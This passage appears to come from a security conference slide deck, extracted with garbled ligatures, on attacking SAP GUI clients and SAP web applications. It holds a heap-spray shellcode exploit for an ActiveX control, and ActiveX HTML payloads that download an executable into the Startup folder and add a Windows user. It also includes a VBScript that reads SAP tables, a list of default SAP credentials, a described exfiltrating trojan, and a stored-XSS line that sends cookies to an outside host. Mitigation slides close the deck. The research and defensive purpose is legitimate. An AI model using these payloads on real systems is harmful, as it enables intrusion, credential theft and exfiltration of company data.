VxFlexgrid  Elazar  Broad  ,    Alexander  Polyakov   BOF h-p://dsecrg.com/pages/vul/show.php?id=117 23.03.2010 BExGlobal Alexey  Sintsov   Insecure  Method h-p://dsecrg.com/pages/vul/show.php?id=164 ???  DSECRG-­‐09-­‐045   Alexander  Polyakov,  Alexey  Troshichev     Insecure  Method Later  or  dsecrg.com  ???  DSECRG-­‐09-­‐069  Alexey  Sintsov  (DSecRG) Memory  CorrupAon Later  or  dsecrg.com  ???  DSECRG-­‐09-­‐070  Alexey  Sintsov  (DSecRG) Format  String Later  or  dsecrg.com  ???  DSECRG-­‐00173  Alexander  Polyakov  (DSecRG) Insecure  Method Later  or  dsecrg.com Ac=veX  Vulnerabili=es  hist.   17  
  • 18. Ac=veX  Buffer  Overflows     •  The  first  example  was  found  by  Mark  Litchfield  in  January,  2007   •  Vulnerable  components:    kwedit    and    rfcguisink   •  Later  were  found  more  BOF  in  SAP  AcAveX  controls   •  Successful    exploitaAon  =  full  remote  control   •  For  most  of  vulnerabiliAes  exploits  available     18  
  • 19. Ac=veX  Buffer  Overflows  in  the  3rd  party   components   •  15.11.2007     –  Elazar  Broad  published  BOF  exploit  for    ComponentOne  FlexGrid  AcAveX   –  Vendor  did  not  release  any  patches   •  26.11.2008   –  ERPScan  found  this  component  to  be  installed  by  default  withSAP  GUI   and  with  SAP  Business  One  Client     –  We  posted  it  to  SAP   –  SAP  added  killbit  recommendaAons  for  SAP  GUI  (1092631  )   •  08.07.2009   –  SAP  released  patch  for  SAP  Business  One  Client  (sapnote  1327004  )     19  
  • 20. Ac=veX  Buffer  Overflows    in  3rd  party   components  (Example)   Using  vulnerability  in  one  FlexGrid  and  heap  spray  exploit  a-acker  can  run  calc.exe  for  example:       <HTML> <HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <script language="JavaScript" defer> var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); var sSlide = unescape("%u9090%u9090"); var heapSA = 0x0c0c0c0c; function tryMe() {var buffSize = 5200; var x = unescape("%0c%0c%0c%0c"); while (x.length<buffSize) x += x; x = x.substring(0,buffSize); 20  
  • 21. Advanced  Ac=veX  AQacks     •  Buffer  overflows  is  not  the  only  one  vulnerability  in  AcAveX   components.   •  There  are  AcAveX  controls  that  can:   –  Download  and  exec  executables  such  as  Trojans   –  Run  any  file/command   –  Read/Write    files   –  Overwrite/Delete  files   –  Connect  to  SAP  servers     21  
  • 22. Download  and  exec  executables     A-acker  can  upload  trojan  on  a  vicAm’s  PC  and  save  it  in  autorun.   <html> <title>DSecRG SAP ActiveX download and execute</title> <object classid="clsid:2137278D-EF5C-11D3-96CE-0004AC965257" id=‘test'></object> <script language='Javascript'> function init() { var url = "http://172.16.0.1/notepad.exe"; var FileName='/../../../../../../../../../Documents and Settings/All Users/Start menu/Programs/Startup/notepad.exe'; test.Comp_Download(url,FileName); </script> DSecRG </html>       22  
  • 23. Run  any  programm      A-acker  can  run  any  program,  such  as  add  any  user  to  vicAm’s  PC       <html> <title>*DSecRG* Add user *DSecRG*</title> <object classid="clsid:A009C90D-814B-11D3- BA3E-080009D22344" id=‘test'></object> <script language='Javascript'> function init() { test.Execute("net.exe","user DSecRG p4ssW0rd /add“ ,"d: windows",1,"",1); } init(); </script> DSecRG </html>   23  
  • 24. Run  any  programm     •  A-acker  can  overwrite  any  file  such  as  SAP  configuraAon  file     <HTML> <title>*DSecRG* delete config<title> <BODY> <object id=test classid="clsid:{A76CEBEE-7364-11D2- AA6B-00E02924C34E}"></object> <SCRIPT> function init() { File = "c:WINDOWSsaplogon.ini" test.SaveToSessionFile(File) } Init(); </SCRIPT> </BODY> </HTML>       24  
  • 25. Connect  to  SAP  servers   There  are  also  some  a-acks  that  don’t  use  any  vulnerabiliAes   •  Many  AcAveX  execute  different  SAP  funcAons  such  as   connecAng  to  server     •  Combining  those  methods  an  a-acker  can  construct  any  a-ack     •  In  our  example  we  use  SAP.LogonControl  for  connecAon  using   RFC  protocol  and  SAP.TableFactory  for  selecAon  data  from  the   tables   •  Generated    exploit  connects  to  SAP  server  and  selects  criAcal   data  from  SAP  server     25  
  • 26. Connect  to  SAP  server     Sub Main() Set LogonControl = CreateObject("SAP.LogonControl.1") Set funcControl = CreateObject("SAP.Functions") Set TableFactoryCtrl = CreateObject("SAP.TableFactory.1") call R3Logon funcControl.Connection = conn call R3RFC_READ_TABLE(“KNA1") conn.Logoff MsgBox " Logged off from R/3! " End Sub Sub R3Logon() Set conn = LogonControl.NewConnection conn.ApplicationServer = "172.16.1.14" ' IP or DNS-Name of the R/3 application server conn.System = "00" ' System ID of the instance, usually 00 conn.Client = "000" ' opt. Client number to logon to conn.Language = "EN" ' opt. Your login language conn.User = “SAP*" ' opt. Your user id conn.Password = “06071992" ' opt. Your password eQUERY_TAB.Value = pQueryTab ' pQueryTab is the R/3 name of the table TOPTIONS.AppendRow ' new item line 'TOPTIONS(1,"TEXT") = "MANDT EQ '000'" If RFC_READ_TABLE.Call = True Then If TDATA.RowCount > 0 Then MsgBox TDATA(1, "WA") Else MsgBox "Call to RFC_READ_TABLE successful! No data found" End If Else MsgBox "Call to RFC_READ_TABLE failed!" End If End Sub 26  
  • 27. Ac=veX  AQacks:  sapsploit     sapsploit  -­‐  tool  for  automa,c  sap  clients  exploita,on  using  all  kind   of  Ac,veX  vulnerabili,es.    developed  by  ERPScan  researchers:   Alexander  Polyakov  (@sh2kerr)and  Alexey  Sintsov(@asintsov).   •  Perl  generator  for  evil  html  page   •  Modular  structure   •  Collect  all  described  exploits   •  2  Payloads  (exec  command  or  upload  saptrojan)   •  jitspray  exploit  versions  by  Alexey  Sintsov  in  (beta)   27  
  • 28. Ac=veX  AQacks:  sapsploit     You  Got  access  to  the  client’s  OS  what  then?   •  Obtain  informaAon  about  SAP  servers   •  Connect  to  SAP  servers  using  default  or  stolen  credenAals   •  Obtain  criAcal  data  from  SAP  server   •  Transmit  it  securely  to  a-acker   •  Something  more   28  
  • 29. Saptrojan:  Gathering    info   •  All  connecAons  to  SAP  servers  stored  in  configuraAon  file   •  By  default:   –  C:WINDOWSsaplogon.ini   –  D:WINDOWSsaplogon.ini   –  C:WINNTsaplogon.ini   –  D:WINNTsaplogon.ini   •  From  this  file  we  get:   –  IP  address   –  Instance  ID   –  SID   –  Default  Client   29  
  • 30. USER   PASSWORD   CLIENT   SAP*   06071992   000  001  066   DDIC   19920706   000  001   TMSADM   PASSWORD   000   SAPCPIC   ADMIN   000  001   EARLYWATCH   SUPPORT   066   Saptrojan:  Connec=ng  to  SAP   •  Try  default  passwords   •  Try  to  read  them  from  sapshortcuts  (filetype  *.sap  on  desktop   or  sapworkdir)     •  Try  to  bruteforce  (rfc  brute  is  not  locking  before  6.20)   •  Try  to  bruteforce  2  minutes  before  midnight  ☺  (login/ failed_user_auto_unlock)   •  Or  upload  keylogger     30  
  • 31. •  We  can  simply  sniff  passwods  if  we  are  on  vicAms  pc     –  Using  keylogger  (u  can  upload  any  one  using  downl&exec  payload)     –  By  sniffing  traffic  (data  encrypted  by  default  )   •  We  can  turn  off  data  encrypAon  using  variable   TDW_NOCOMPRESS=1   •  Aser  it  we  can  sniff  passwords  locally  or  by  arpspoof  if  we  in  the   same  segment   •  This  funcAon  is  included    in  saptrojan   31   Saptrojan:  Some  fun    
  • 32. •  Aser  successefull  connecAon  trying  to  download  criAcal   informaAon:   –  Table  usr02  –  all  passwords  (unfortunately  in  RAW  format)   –  Table  KNA1  –  table  with  data  about  all  Customers     –  Table  LFA1  –  table  with  vendor  master  data     –  Anything  else  u  want  ☺     All  this  informaAon  well  be  presented  to  TOP’s  to  show  the  criAcality  of   vulnerabiliAes         32   Saptrojan:  Downloading  Cri=cal  info    
  • 33. •  Aser  successefull  download  we  thansfer  it  to  a-ackers  server   (sapsploit):   –  Transfer  is  making  using  HTTP  post  requests   –  All  informaAon  is  encrypted  to  prevent  any  possible  DLP  soluAons   –  Decrypts  on  the  server  site  and  saves       JUST  ONE  CLICK  FROM  INSTALLING  SAPSPLOIT  TO  GETTING   CRITICAL  INFORMATION  FROM  INSIDE  THE  COMPANY  THAT  USE   SAP.   33   Saptrojan:  Uploading  it  to  aQacker’s  sever    
  • 34. saptrojan  -­‐  tool  for  gaining  addi,onal  informa,on  from  users   worksta,ons  and  aFack  SAP  servers.  developed  by  ERPScan   researchers:  Alexander  Polyakov  and  Alexey  Sintsov.   •  Wri-en  on  vbs  and  use  SAP  AcAveX  controls.   •  Connects  to  the  SAP  server  using  different  methods   •  Download  criAcal  informaAon     •  Transfer  it  encrypted   34   Ac=veX  AQacks:  saptrojan  
  • 35. •  Many  workstaAons  (about  50%)  sAll  run  on  SAPGUI  6.4.  Don’t   use  SAPGUI  6.4    (there  is  no  patches  for  some  vulns  )   •  Patch  SAPLPD   •  Patch  SAPGUI  7.1  for  at  least  sp10  or  set  killbits     •  Don’t  click  on  untrusted  links  ))   •  Don’t  store  password  in  shortcuts  (HKCUSoswareSAP SAPShortcutSecurity  EnablePassword=0)   •  Securely  use    shortcuts   h-p://www.basis2048.com/sap-­‐gui-­‐for-­‐windows-­‐security-­‐ execuAon-­‐of-­‐sapshortcuts-­‐1344.htm   35   Mi=ga=ons    
  • 36. 36   SAPSPLOIT  &  SAPTROJAN   DEMO  
  • 37. Mi=ga=ons     •  Many  workstaAons  (about  50%)  sAll  run  on  SAPGUI  6.4.  Don’t   use  SAPGUI  6.4    (there  is  no  patches  for  some  vulns  )   •  Patch  SAPLPD   •  Patch  SAPGUI  7.1  for  at  least  sp10  or  set  killbits     •  Don’t  click  on  untrusted  links  ))   •  Don’t  store  password  in  shortcuts  (HKCUSoswareSAP SAPShortcutSecurity  EnablePassword=0)   •  Securely  use    shortcuts   h-p://www.basis2048.com/sap-­‐gui-­‐for-­‐windows-­‐security-­‐ execuAon-­‐of-­‐sapshortcuts-­‐1344.htm   37  
  • 39. WEB  Clients  AQacks   •  Many  SAP  systems    transferred  to  the  web     •  For  example  SAP  CRM,  SRM,  Portal   •  There  are  also  many  custom  applicaAons   •  All  those  applicaAons  store  many    vulnerabiliAes   •  Despite  that  vulnerabiliAes  are  found  in  WEB  servers,  most  of   the  a-acks  are  targeted  at  SAP  clients.      Thus,  speaking  about  safety  of  SAP-­‐clients  it  is  necessary  to   men,on  typical  client-­‐side  vulnerabili,es  in  web  applica,ons   39  
  • 40. •  Linked  XSS   •  Phishing   •  XSRF   •  HTML  InjecAon  and  Stored  XSS   Typical  AQacks  on  SAP  WEB  Clients     All  of  those  aFacks  are  possible  in  SAP   40  
  • 41. There  was  another  real  life  example.   One  company  uses  SRM  system  –  supplier  resource  management   system.  This  system  was  developed  for  automated  tender  system.   Any  company  (and  not  only  :)   Can  register  in  that  system  and  publish  a  tender  informaAon.  This   ApplicaAon  is  visible  from  outside  using  web       You  don’t  believe  me  ?  )   41  
  • 42. •  SAP  SRM  use  cFolders  web-­‐based  applicaAon  for  collaboraAve   share  of  the  informaAon   •  cFolders  is  integrated  to  SAP  ECC,  PLM,SRM,KM  and  cRooms     •  If  one  user  can  get  access  to  another  or  to  administrators   console  it  is  a  criAcal  vulnerability     •  There  are  many  ways  to  do  this     •  So  lets  Begin!!!!   AQacking    SAP  SRM   42  
  • 43. Start  with  simple  Phishing     •  Using    XSS  (ERPSCAN-­‐08-­‐038)  it  is  possible  to  steal  a  user’s   creden=als   •  It  is  not  a  simple  XSS  because  it  is  found  on  login  page  before   auth.   •  IT  injects  code  into  page  source  acer  forms  of  input  of  a  login   and  a  password   •  So  we  can  rewrite  standard  entry  fields  with  fake  that  will   transfer  the  data  entered  by  a  user,  on  a  a-acker’s  site   •  Need  some  Ame  to  make  it  clear  ))   43  
  • 45. Con=nuing  with  Linked  XSS     •  There  are  so  many  XSS  vulnerabiliAes  in  SAP……..     •  Found  them  in       –  h-p://erpscan.com     –  h-p://onapsis.com   –  h-p://cybcec.com   +  may  talk  from  troopers10         45  
  • 46. Con=nue  with  XSRF   •  SAP  MMR  accessable  from  internet  vulnerable  to  DOS  a-ack  by   sending  a  mulAple  packets  with  performance  test  request.   (ERPSCAN-­‐00125  previosly  reported)   •  In  new  versions  MMR  needs  auth   •  We  can  simply  send  URL  to  administrator  and  run  DOS  a-ack       46  
  • 47. •  Much  more  interesAng  and  cri=cal  vulnerability  then  linked   XSS     •  Cfolders  engine  allows  to  create  HTML  documents  containing   any  data  and  to  place  them  in  shared  folders   •  Any  authen=cated  user  (supplier)  can  inject  malicious  code  in   the  portal  page   •  In  simple  scenario  we  can  put  cookie  sniffer  into  shared  folder   and  get  access  to  purchaser  session.   •  More  advanced  scenario  –  Insert  Sapsploit  into  HTML   document  and  obtain  shell  access  :)     <html><script>document.location.href='http:// erpscan.com/?'+document.cookie;</script></html> Stored  XSS   47  
  • 48. Stored  XSS  part  2  (more  aQacks)   Code  injec=on  in    Bookmark  crea=on  op=on   •  He  can  inject  javascript  code  into  Bookmark  field  on  the  page   h-ps://[site]/sap/bc/bsp/sap/cfx_rfc_ui/hyp_de_create.htm   example  link  value:  h-p://test.com"   onmouseover="alert(document.cookie)">   Then  when  administrator  browses  for  user  folders  script  will   execute.     48  
  • 49. Stored  XSS  part  2  (more  aQacks)   Code  injec=on    document  uploading  area   •  A  user  can  create  a  document  with  the  file  name  including   javascript  code.   example  filename  value:    aaa"><script>alert()</script>.doc     So  using  this  vulnerabiliAes  a  user  can  steal  cookie  or  upload   sapsploit  like  he  did  in  the  first  example.   49  
  • 50. 50   ATTACKING  WEB  CLIENTS   DEMO  
  • 51. •  ERP  systems  such  as  SAP  is  one  of  the  main  business  element  of   any  company   •  In  case  of  SAP  we  saw  a  different  vulnerabili=es  at  all   presenta=on  levels   •  Problems  are  with  architecture,  socware  vulnerabiliAes  and   implementa=on   •  SAP  HAS  soluAons  for  almost  all  possible  security  problems   (patches,  guides)   •  The  number  of  these  problems  is  so  huge  and  specific     •  Keep  in  mind  that  it  is  be-er  to  start  thinking  about  security   before  than  aser    implementaAon.   If  u  can  have  a  special  skilled  department  and  work  24/7    –  do   this.  If  not  –  keep  it  to  professionals   Conclusion   51  
  • 52. web:  www.erpscan.com         e-­‐mail:  info@erpscan.com,  sales@erpscan.com   52